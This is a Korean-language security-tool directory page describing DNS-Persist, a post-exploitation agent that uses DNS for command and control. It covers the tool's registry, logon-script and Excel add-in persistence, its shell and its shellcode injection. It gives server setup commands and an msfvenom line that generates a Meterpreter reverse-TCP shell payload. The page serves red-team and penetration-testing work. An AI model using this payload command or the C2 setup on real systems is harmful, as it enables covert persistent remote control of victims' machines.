Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
DNS-Persist — DNS-Persist는 DNS를 명령 및 제어에 사용하는 포스트 익스플로레이션 에이전트입니다. | Kitploit
도구/GitHubGitHub/0x09al/dns-persist
Payload GenerationPersistence MechanismsShellcodePost-ExploitationPenetration TestingCommand and ControlRed TeamingDNS Analysis
GitHub0x09al/dns-persist

DNS-Persist

DNS-Persist는 DNS를 명령 및 제어에 사용하는 포스트 익스플로레이션 에이전트입니다.

저장소 보기
207638년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

DNS-Persist

DNS-Persist는 DNS를 명령 및 제어에 사용하는 사후 익스플로잇 에이전트입니다. 서버 측 코드는 Python으로 작성되었고 에이전트는 C++로 코딩되었습니다. 이는 첫 번째 버전이며, 향후 더 많은 기능과 개선 사항이 추가될 예정입니다.

시작하기

작성자

0x09AL - https://twitter.com/0x09al

면책 조항

이 소프트웨어를 불법적인 목적으로 사용하지 마십시오.

저자는 여기에 제공된 코드의 오용에 대해 어떠한 책임도 지지 않습니다.

바퀴를 재발명했나요?

DNS C2에 관한 훌륭한 작업이 많지만, 저는 이 소프트웨어를 지속성(persistence) 부분에 더 초점을 맞추어 만들었습니다. 저는 C++ 전문가가 아니며, 이것이 C++로 작성한 첫 번째 '실제 프로그램'입니다. (그러므로 어색한 코드가 있을 수 있습니다.)

기능 및 개선 사항에 대한 제안은 언제든지 환영합니다.

아키텍처

두 가지 주요 부분이 있습니다:

  1. DNS 서버
  2. 에이전트

대체 텍스트

기능

지속성 메커니즘

이 버전에는 3가지 지속성 메커니즘만 있습니다. 나중에 더 추가될 예정입니다.

  1. LogonScript 지속성.
  2. RunKey 지속성.
  3. Excel 추가 기능(Addin) 지속성.

'대화형' 명령 셸

이 버전은 시스템 명령을 실행하는 데 사용할 수 있는 유사 대화형 명령 셸을 지원합니다.

셸코드 주입

이 버전은 32비트 셸코드 주입을 지원합니다. 셸코드는 동일한 프로세스의 새 스레드에서 실행되므로, 셸코드가 충돌하거나 유효하지 않으면 에이전트도 충돌합니다. 셸코드에 NULL 바이트가 없도록 하십시오.

셸코드 생성 예제

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port EXITFUNC=thread -b "\x00" -f hex -o /tmp/shellcode.hex

할 일 목록

  1. 암호화 추가. 이 버전에는 암호화가 없으므로 사용 시 스스로 위험을 감수하십시오.
  2. 더 많은 지속성 메커니즘 추가.
  3. 다른 프로그래밍 언어로 작성된 에이전트.

설치 및 사용법

서버 측

root@kitploit:~
pip install dnslib
git clone https://github.com/0x09AL/DNS-Persist
python server.py

기본적으로 포트 53에서 DNS 서버가 시작됩니다. server.py 파일에서 이를 변경할 수 있습니다.

에이전트

에이전트를 코딩하는 데 Visual Studio 2010을 사용했으므로 가져오기와 컴파일이 상당히 쉬울 것입니다.

Declarations.h 파일의 DOMAIN_NAME 변수를 도메인 이름에 맞게 변경해야 합니다.

도메인의 네임서버는 DNS-Persist IP 주소를 가리켜야 합니다.

root@kitploit:~
#define DOMAIN_NAME "example.com"

스크린샷

  1. 그림-1

대체 텍스트

  1. 그림-2

대체 텍스트

  1. 그림-3

대체 텍스트

  1. 그림-4

대체 텍스트

도구 다운로드